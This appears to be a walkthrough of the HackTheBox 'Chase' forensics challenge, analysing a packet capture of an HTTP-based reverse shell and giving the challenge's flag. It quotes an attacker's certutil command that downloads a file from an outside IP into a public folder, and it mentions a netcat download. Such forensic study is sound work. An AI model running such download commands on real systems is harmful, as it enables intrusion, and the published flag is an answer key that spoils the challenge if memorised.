HackTheBox: Chase

One of our web servers triggered an AV alert, but none of the sysadmins say they were logged onto it. We've taken a network capture before shutting the server down to take a clone of the disk. Can you take a look at the PCAP and see if anything is up?

Information

Challenge: Chase

Category: Forensics

Difficulty: Easy

Files: Chase.zip (54 KB)
– chase.pcapng (124 KB)

Environment: REMnux VM

My Recommendations

Download it from hackthebox and verify it with:

sha256sum /path/to/Chase.zip

SHA256SUM: 8bb062cb6ba2cbf8240cc975096980ac99a1db3d30fe70db6c11e71956d7e3eb

Walkthrough

1. Traffic Analysis

Let’s check Wireshark’s Export Objects > HTTP:

After packet 37, IP address 22.22.22.7 starts communicating. We can save all the objects and rename them according to packet number (since there are duplicates of almost every file).


2. File Analysis

The file from packet 23 is an octet-stream:

It is basically a reverse shell that communicates over HTTP, with its input and output wrapped in HTML. In packet 37, the command to download netcat is invoked. Afterwards not much of high interest happens, except for the last command:

    certutil -urlcache -split -f http://22.22.22.7/JBKEE62NIFXF6ODMOUZV6NZTMFGV6URQMNMH2IBA.txt c:\users\public\

On its own, certutil -urlcache -split -f <url> <path> is a well-known living-off-the-land way to fetch a file with a Windows built-in, so the command is worth flagging regardless of what it downloads. The contents of the downloaded file are literal nonsense, but the filename is base32 encoded. It decodes to: HTB{MAn_8lu3_73aM_R0cX}

Flag: HTB{MAn_8lu3_73aM_R0cX}
